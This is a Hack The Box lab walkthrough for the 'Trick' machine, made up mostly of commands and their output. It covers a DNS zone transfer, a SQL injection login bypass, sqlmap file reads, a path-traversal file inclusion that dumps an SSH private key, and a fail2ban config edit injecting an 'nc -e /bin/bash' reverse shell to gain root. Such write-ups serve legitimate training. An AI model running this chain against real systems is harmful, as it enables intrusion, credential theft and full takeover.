# DNS ENUM

`dig -x 10.129.83.230 @10.129.83.230`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Trick]
└─# dig -x 10.129.83.230 @10.129.83.230

; <<>> DiG 9.18.1-1-Debian <<>> -x 10.129.83.230 @10.129.83.230
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48718
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 2cee198848eb9c5f942bfcc562c47c708e43ceaf66053768 (good)
;; QUESTION SECTION:
;230.83.129.10.in-addr.arpa.    IN      PTR

;; ANSWER SECTION:
230.83.129.10.in-addr.arpa. 604800 IN   PTR     trick.htb.

;; AUTHORITY SECTION:
83.129.10.in-addr.arpa. 604800  IN      NS      trick.htb.

;; ADDITIONAL SECTION:
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1

;; Query time: 148 msec
;; SERVER: 10.129.83.230#53(10.129.83.230) (UDP)
;; WHEN: Tue Jul 05 14:01:19 EDT 2022
;; MSG SIZE  rcvd: 164
```

`dig axfr @10.129.83.230 trick.htb`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Trick]
└─# dig axfr @10.129.83.230 trick.htb  

; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.129.83.230 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1
preprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 148 msec
;; SERVER: 10.129.83.230#53(10.129.83.230) (TCP)
;; WHEN: Tue Jul 05 14:02:26 EDT 2022
;; XFR size: 6 records (messages 1, bytes 231)
```

# Add subdomains

```
┌──(root㉿kali)-[~/htb/Box/Linux/Trick]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.129.83.230   trick.htb preprod-payroll.trick.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

# Bypass Login SQLi

```
POST /ajax.php?action=login HTTP/1.1
Host: preprod-payroll.trick.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 41
Origin: http://preprod-payroll.trick.htb
Connection: close
Referer: http://preprod-payroll.trick.htb/login.php
Cookie: PHPSESSID=p8q2ovkskuhj3dcj9dsvqkesgg

username='or'1'='1&password='or'1'='1
```

# Enum web page

`http://preprod-payroll.trick.htb/index.php?page=users`
```
Enemigosss : SuperGucciRainbowCake
```

# Enum sqli

`sqlmap -r req.txt -p username --dbms=mysql --dbs`
```
[*] information_schema
[*] payroll_db
```

`sqlmap -r req.txt -p username --dbms=mysql --current-user`
```
current user: 'remo@localhost'
```

`sqlmap -r req.txt -p username --dbms=mysql --privileges`
```
database management system users privileges:
[*] %remo% [1]:
    privilege: FILE
```

`sqlmap -r req.txt -p username --dbms=mysql --file-read=/etc/nginx/sites-enabled/default`
```
server {
	listen 80 default_server;
	listen [::]:80 default_server;
	server_name trick.htb;
	root /var/www/html;

	index index.html index.htm index.nginx-debian.html;

	server_name _;

	location / {
		try_files $uri $uri/ =404;
	}

	location ~ \.php$ {
		include snippets/fastcgi-php.conf;
		fastcgi_pass unix:/run/php/php7.3-fpm.sock;
	}
}


server {
	listen 80;
	listen [::]:80;

	server_name preprod-marketing.trick.htb;

	root /var/www/market;
	index index.php;

	location / {
		try_files $uri $uri/ =404;
	}

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
        }
}

server {
        listen 80;
        listen [::]:80;

        server_name preprod-payroll.trick.htb;

        root /var/www/payroll;
        index index.php;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}
```

# Read index.php

`sqlmap -r req.txt -p username --dbms=mysql --file-read=/var/www/market/index.php`

```
<?php
$file = $_GET['page'];

if(!isset($file) || ($file=="index.php")) {
   include("/var/www/market/home.html");
}
else{
        include("/var/www/market/".str_replace("../","",$file));
}
?>
```

# Bypass Local File Inclusion

`http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//etc/passwd`
```
michael:x:1001:1001::/home/michael:/bin/bash
```

`http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//home/michael/.ssh/id_rsa`
```
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
```

# SSH Connection

`ssh -i michael_rsa michael@10.129.83.230`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Trick]
└─# chmod 400 michael_rsa 
                                                                                                                                                 
┌──(root㉿kali)-[~/htb/Box/Linux/Trick]
└─# ssh -i michael_rsa michael@10.129.83.230
Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
michael@trick:~$ cat user.txt 
36c227a5d19c4e2f9d9b691fa50c4e7a
michael@trick:~$
```

# Priv Esc

`sudo -l`
```
michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart
```

```
michael@trick:~$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)
michael@trick:~$ ls -la /etc/fail2ban 
total 76
drwxr-xr-x   6 root root      4096 Jul  5 22:15 .
drwxr-xr-x 126 root root     12288 Jul  5 21:59 ..
drwxrwx---   2 root security  4096 Jul  5 22:15 action.d
-rw-r--r--   1 root root      2334 Jul  5 22:15 fail2ban.conf
drwxr-xr-x   2 root root      4096 Jul  5 22:15 fail2ban.d
drwxr-xr-x   3 root root      4096 Jul  5 22:15 filter.d
-rw-r--r--   1 root root     22908 Jul  5 22:15 jail.conf
drwxr-xr-x   2 root root      4096 Jul  5 22:15 jail.d
-rw-r--r--   1 root root       645 Jul  5 22:15 paths-arch.conf
-rw-r--r--   1 root root      2827 Jul  5 22:15 paths-common.conf
-rw-r--r--   1 root root       573 Jul  5 22:15 paths-debian.conf
-rw-r--r--   1 root root       738 Jul  5 22:15 paths-opensuse.conf
```

# Fail2ban Priv esc

`scp -i michael_rsa michael@10.129.83.230:/etc/fail2ban/action.d/iptables-multiport.conf .`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Trick]
└─# scp -i michael_rsa michael@10.129.83.230:/etc/fail2ban/action.d/iptables-multiport.conf . 
iptables-multiport.conf                                                                                        100% 1420     4.7KB/s   00:00
```

`rm -rf /etc/fail2ban/action.d/iptables-multiport.conf`
```
michael@trick:~$ rm -rf /etc/fail2ban/action.d/iptables-multiport.conf
```

`scp -i michael_rsa iptables-multiport.conf michael@10.129.83.230:/etc/fail2ban/action.d/iptables-multiport.conf`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Trick]
└─# scp -i michael_rsa iptables-multiport.conf michael@10.129.83.230:/etc/fail2ban/action.d/iptables-multiport.conf
iptables-multiport.conf                                                                                        100% 1494     9.8KB/s   00:00
```

`cat /etc/fail2ban/action.d/iptables-multiport.conf`
```
michael@trick:~$ cat /etc/fail2ban/action.d/iptables-multiport.conf
# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified by Yaroslav Halchenko for multiport banning
#

[INCLUDES]

before = iptables-common.conf

[Definition]

# Option:  actionstart
# Notes.:  command executed once at the start of Fail2Ban.
# Values:  CMD
#
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>

# Option:  actionstop
# Notes.:  command executed once at the end of Fail2Ban
# Values:  CMD
#
actionstop = <iptables> -D <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
             <actionflush>
             <iptables> -X f2b-<name>

# Option:  actioncheck
# Notes.:  command executed once before each actionban command
# Values:  CMD
#
actioncheck = <iptables> -n -L <chain> | grep -q 'f2b-<name>[ \t]'

# Option:  actionban
# Notes.:  command executed when banning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
            nc -e /bin/bash 10.10.14.6 1234
# Option:  actionunban
# Notes.:  command executed when unbanning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
              nc -e /bin/bash 10.10.14.6 1234
[Init]
```

`sudo /etc/init.d/fail2ban restart`
```
michael@trick:~$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.
```

`hydra -l root -P /usr/share/wordlists/rockyou.txt 10.129.83.230 -t 10 ssh`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Trick]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt 10.129.83.230 -t 10 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-05 16:37:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://10.129.83.230:22/
```

`nc -lvnp 1234`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Trick]
└─# nc -lvnp 1234 
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.129.83.230] 50004
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
be260fb254e7da88ca6a3a5f1e19785d
```

# References
https://grumpygeekwrites.wordpress.com/2021/01/29/privilege-escalation-via-fail2ban/
